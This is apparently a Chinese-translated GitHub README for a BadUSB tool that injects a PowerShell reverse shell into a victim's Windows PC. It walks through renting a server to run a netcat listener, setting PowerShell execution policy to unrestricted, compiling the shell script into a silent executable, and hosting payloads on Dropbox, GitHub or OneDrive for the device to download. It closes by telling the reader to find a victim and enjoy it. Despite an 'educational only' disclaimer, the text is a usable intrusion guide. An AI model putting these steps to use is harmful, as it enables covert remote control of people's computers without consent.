tuconnaisyouknow/BadUSB_reverseShellInjector

# BadUSB_reverseShellInjector # 警告 ⚠️ 本仓库中的所有内容**仅供**教育目的。请注意，**我对被盗数据概不负责**。您须对自己使用为 **BadUSB** 开发的脚本所采取的行为**负责**。 # 关于 ℹ️ 此**脚本**允许您通过 **reverse shell** 攻击来获取对 **PC** 的**控制权**。 ### 注意事项 n°1（针对 arduino BadUSB） 有时，您会看到类似这样的内容： ``` Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(KEY_LEFT_ALT); Keyboard.press(173); Keyboard.releaseAll(); ``` 这仅用于输入这些字符：“@”、“\\”。但这取决于计算机的键盘布局，因此请借助此[网站](https://www.csee.umbc.edu/portal/help/theory/ascii.txt)以及您在键盘上实际输入这些字符的序列来调整这些字符。（或者将键盘布局切换为法语）。 ### US 布局 对于 US 布局，您只需将“\\”替换为以下内容： ``` Keyboard.press(92); Keyboard.releaseAll(); ``` 并将“@”替换为以下内容： ``` Keyboard.press(64); Keyboard.releaseAll(); ``` ### 注意事项 n°2 您可以根据插入 **BadUSB** 的速度自定义**延迟**。 ### 注意事项 n°3 当您将 BadUSB 插入 PC 时，您必须等待大写锁定（caps lock）指示灯闪烁后再将其拔出。 # 入门指南 ✔️ ## 前置条件 1. 拥有一个 **BadUSB**。 2. 在[此处](https://www.arduino.cc/en/software)安装 **Arduino 软件**（如果您使用的是基于 arduino 的 BadUSB）； 3. [拥有一个 ssh 服务器](https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector#linode)； 4. [下载 PS2EXE](https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector#ps2exe)； 5. 拥有一台在其 PC 上安装了 **Windows OS** 的受害者； ## Linode 1. 在[此处](https://www.linode.com/)创建一个账户； 2. 进入创建，linode； 3. 选择 Ubuntu 18.04 LTS 发行版； 4. 选择离您居住地最近的区域； 5. 选择共享 CPU，Nanode 1GB； 6. 选择您的服务器标签和密码； 7. 创建 linode； 8. 现在打开终端并输入 ssh 访问命令 (ssh root@your_ssh_ip_adress)； 9. 您现在已连接到您的 ssh 服务器； 10. 要使您的 ssh 服务器始终保持监听状态，请输入以下命令： ``` screen nc -lnvp 87 -s your_ssh_ip_adress CTRL + A D ``` 11. 您的 ssh 服务器现在正在监听，您可以退出了； 12. 要恢复您的监听屏幕，只需输入： ``` screen -r ``` ## PS2EXE 1. 进入此[链接](https://github.com/MScholtes/PS2EXE)并单击主页右上角的绿色按钮。然后单击“Download Zip”并解压 zip 文件。 2. 以管理员身份启动 powershell 并输入以下命令： ``` Set-Location $env:HOMEPATH\Downloads\PS2EXE-master\Win-PS2EXE Set-ExecutionPolicy Unrestricted -Force Import-Module ps2exe win-ps2exe ``` 3. * 选择源文件（您想要转换的文件）。 * 选择目标文件（您希望文件存放的目录）。 * 选择图标文件（您可以在[此处](https://iconarchive.com/)下载一些图标）。 * 勾选 Supress output 和 Suppress error output。 * 然后点击编译按钮完成转换。 ## 安装 1. 下载本仓库； **Linux :** ``` git clone https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector cd BadUSB_reverseShellInjector ``` **Windows :** 点击主页右上角的绿色按钮。然后点击“Download Zip”并解压 zip 文件。 2. 将 [.txt](https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector/blob/main/BadUSB_reverseShellInjector.txt) 第 28 行或 [.ino](https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector/blob/main/BadUSB_reverseShellInjector.ino) 第 93 行中的 LINK 替换掉； 3. 替换[此处](https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector/blob/main/script.ps1)第 8 行的 LINK，并替换[此处](https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector/blob/main/reverseShell.ps1)第 3 行的 IP 和 PORT； 4. [将 reverseShell.ps1 文件转换为 .exe 文件](https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector#ps2exe)； 5. 将 .ino 或 .txt 文件放入您的 **BadUSB** 中； 6. 寻找一个受害者并尽情享受吧！ ## 受害者 PC 的前置条件 * 关闭大写锁定（caps lock）。 * 将键盘布局切换为法语（或根据您的布局调整代码）。 # 如何设置用于 wget 脚本的链接 ⬇️ ## Dropbox 1. 在[此处](https://www.dropbox.com)创建一个 dropbox 账户； 2. 上传您的文件； 3. 复制该文件的链接并将 ?dl=0 更改为 ?dl=1； 4. 您将获得类似这样的链接：https://dropbox.com/s/link/YOURFILE?dl=1； 5. 现在将此链接放入 [.ino](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/BadUSB_passStealer.ino) 或 [.txt](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/BadUSB_passStealer.txt) 文件中； ## Github 1. 在[此处](https://github.com/signup)创建一个 Github 账户； 2. 创建一个公开的存储库（repository）； 3. 上传您的文件； 4. 转到您的文件页面并点击 RAW 按钮； 5. 复制 RAW 页面链接并将其放入 [.ino](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/BadUSB_passStealer.ino) 或 [.txt](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/BadUSB_passStealer.txt) 文件中； ## One Drive 1. 在[此处](https://signup.live.com/signup)创建一个 One Drive 账户； 2. 上传您的文件； 3. 跟随此[教程](https://mangolassi.it/topic/19276/how-to-configure-a-onedrive-file-for-use-with-wget) 4. 将您获取的链接放入 [.ino](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/BadUSB_passStealer.ino) 或 [.txt](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/BadUSB_passStealer.txt)

标签：AI合规, Arduino, BadUSB, IPv6, PowerShell, 内存分配, 反弹Shell, 硬件安全, 网络信息收集